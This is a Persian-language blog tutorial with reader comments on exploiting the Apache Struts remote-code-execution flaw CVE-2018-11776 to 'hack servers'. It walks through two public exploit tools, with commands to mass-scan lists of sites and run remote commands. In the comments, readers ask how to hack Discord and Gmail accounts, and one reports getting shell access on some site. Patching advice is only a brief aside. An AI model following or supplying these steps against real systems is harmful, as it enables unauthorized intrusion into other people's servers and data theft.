هک سرور از طریق باگ جدید apache struts
هک سرور – در این اموزش با اکسپلویت اسیب پذیری apache struts اشنا می شوید و ابزاری را برای استفاده از این اسیب پذیری معرفی میکنیم.
در ادامه اموزش هک سرور با استفاده از باگ apache struts با ما همراه باشید.
هک سرور با اکسپلویت apache struts
توضیحات
پس از مدت کوتاهی دوباره شاهد یک باگ جدید و حساس برای Apache Struts شدیم
اسیبپ پذیری جدیدی برای سرویس Apache-Struts کشف شده است که از نوع rce میباشد (Remote File Include)
این حفره امنیتی در نسخه های 2.3 تا 2.3.34 | 2.5 تا 2.5.16 وجود دارد
و برای حفط امنیت سرور حتما ان را به اخرین نسخه اپدیت نمایید
از این اسیب پذیری میتوان به روش های مختلفی استفاده کرد اما ما در این اموزش دو ابزار را معرفی میکتیم که به صورت ساده قابل استفاده هستند.
نکته : در صورتی که به مباحث هک سرور علاقه مند هستید پیشنهاد می کنیم اموزش سرور هکینگ را مشاهده نمایید.
اموزش هک سرور با استفاده از روش اول
در ابتدا دقت داشته باشید در سیستمی که می خواهید تست اکسپلویت را در ان انجام دهید پایتون 2 یا 3 نصب باشد به دلیل نوشته شدن ابزار به زبان پایتون
ابزار را از بخش دانلود در اخر صفحه دانلود کنید برای دانلود بصورت پوشه در لینوکس خود از دستور زیر استفاده کنید :
git clone Link
سپس با دستور زیر وارد پوشه دانلود شده شوید که ابزار اصلی در ان است
cd struts-pwn_CVE-2018-11776
برای برسی سایت مورد نظر که ایا به این حفره امنیتی اسیب پذیر است مانند دستور زیر ادرس سایت را وارد کنید
python3 struts-pwn.py –url https://site.com/struts2-showcase/index.action
اگر میخواهید چندین وبسایت را بصورت هم زمان برسی کنید ان ها را در یک فایل ذخیره کنید و فایل خود را بصورت لیست به برنامه بدهید تا سکن شود
python3 struts-pwn.py –list list-site.txt
برای استفاده از این اسیب پذیری و دسترسی ریمود از دستور زیر استفاده شود
python3 struts-pwn.py –exploit –url ‘https://site.com/struts2-showcase/index.action’ -c id
اموزش روش دوم هک سرور با ابزار دیگر
ابزاری دیگری که معرفی میکنیم برای استفاده از اسیب پذیری ها با شناسه های زیر است
- CVE-2013-2251
- CVE-2017-5638
- CVE-2018-11776
ابتدا ابزار را از بخش دانلود دریافت کنید
git clone link
سپس وارد پوشه دانلود شده شوید
cd Apache-Struts-v3
حال ابزار را با دستور زیر اجرا کنید
python ApacheStruts.py
بعد از اجرای ابزار نیازی به استفاده بصورت سویچ نیست و هر گزینه ای که میخواهید استفاده کنید در حالت اجرای ابزار انتخاب میکنید
ابزار که اجرا شد لینک سایت مورد نظر خود را وارد کنید و run exploit را بزنید درصورتی که اسیبپذیری وجود داشته باشد
به صورت ریموت دسترسی کامل خواهید داشت و میتوانید دستورات خود را بر روی سرور سایت اجرا کنید
نتیجه گیری
ابزار دوم که معرفی شد کار با ان نسبتا ساده تر برای هک سرور است اما ابزار دوم امکانات بیشتری را در اختیار شما میگزارد
انتخاب شما بسته به نوع کار شما است و برای امنیت در مقابل این حفره امنیتی حتما تمامی پکیج های نصب شده سرور را اپدیت کنید
دانلود ابزار ها
[ برای درافت فایل وارد شوید و یا ثبت نام کنید! ]
امیدواریم این اموزش هک امنیت سرور مفید واقع شده باشد
موفق و پیروز باشید.
۱۵ دیدگاه در “هک سرور از طریق باگ جدید apache struts”
root@localhost:~/struts-pwn_CVE-2018-11776# python3 struts-pwn.py –url https://site.com/struts2-showcase/index.action
usage: struts-pwn.py [-h] [-u URL] [-l USEDLIST] [-c CMD] [–exploit]
struts-pwn.py: error: unrecognized arguments: –url https://site.com/struts2-showcase/index.action
ارور میدهد
مجدد با پاتون ۲.۷ تست کنید مشکلی نباید به وجود باید
با سلام ممنون و تشکر بسیار بابت آموزش هایی که به زبان فارسی قرار دادید که بتوانیم آسان تر روی آن مطالعه داشته باشیم و درک بالاتری از مطلب بگیریم خیلی متشکرم
درود بر شما بسیار ممنون از نظر لطف شما
پاینده باشید
دستورارو تایید نمیکنه با پایتون ۲.۷ هم تست کردم
invaild syntax
این ارور رو میاره
درود
از پایتون ورژن ۳ استفاده کنید
چگونه میشه دیسکورد را هک کرد
اگر اطلاعات جیمیل تارگت رو داشته باشم میشه خراب کاری کرد میشه آموزش گرفتن اطلاعات جیمیل رو با پایتون ویندوز رو بزارید ممنون میشم
درود
سوال اول شما مرتبط نبود در صورت امکات اموزش جداگانه ای در این رابطه قرار خواهد گرفت.
پایتون یک زبان برنامه نویسی است و صرفا مربوط به هک نیست ، می توانید اموزش هک جیمیل را در پن تست کور مشاهده کنید.
سلام لطفا لینک cve رو بفرستید
درود
بفرمایید :
https://nvd.nist.gov/vuln/detail/CVE-2018-11776
سلام چطور باید بفهمیم ورژن سرور تارگت چند است؟
درود
اموزش ابزار nmap را در پن تست کور مشاهده کنید این مورد داخل این اموزش گفته شده است.
سلام در نسخه ۲.۴.۴۱ این اسیب پذیری است؟
درود
همانطور که گفته شده نسخه های ۲.۳ تا ۲.۳.۳۴ و ۲.۵ تا ۲.۵.۱۶ فقط دارای این اسیب پذیری هستند.
سلام خسته نباشید من یه سایتی رو وارد کردم تایید کرد و اینو میاره Struts2@CVE-2013-2251 که میگه دستور وارد کنم و من pwnd رو زدم و اینو آورد path EJ:/tmp/: حالا که هرچی میزنم ازش خارج میشه